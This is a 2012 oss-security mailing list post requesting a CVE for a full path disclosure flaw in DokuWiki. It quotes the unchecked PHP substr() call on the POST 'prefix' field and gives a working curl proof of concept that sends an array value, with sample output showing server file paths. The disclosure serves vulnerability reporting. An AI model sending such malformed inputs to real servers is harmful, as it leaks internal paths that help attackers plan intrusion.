Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 24 Jun 2012 09:40:13 -0300
From: Felipe Pena <felipensp@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: Full path disclosure in DokuWiki

Full path disclosure in DokuWiki
========================================
  DokuWiki is a simple to use Wiki aimed at the documentation needs of a small
company. It works on plain text files and thus needs no database. It has a
simple but powerful syntax which makes sure the datafiles remain readable
outside the Wiki.

  The POST input 'prefix' is not checked/casted for proper data type before
passing to PHP's substr() function, which lead to displays an warning with
sensitive information on server with PHP error level enabled:

  $PRE   = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null |
grep Warning
<b>Warning</b>:  substr() expects parameter 1 to be string, array given in
<b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by
(output started at /var/www/dokuwiki/doku.php:47) in
<b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
========================================
- Angua (RC1)
- Rincewind
- Anteater

References:
========================================
http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure

Credits:
========================================
This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

-- 
Regards,
Felipe Pena

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ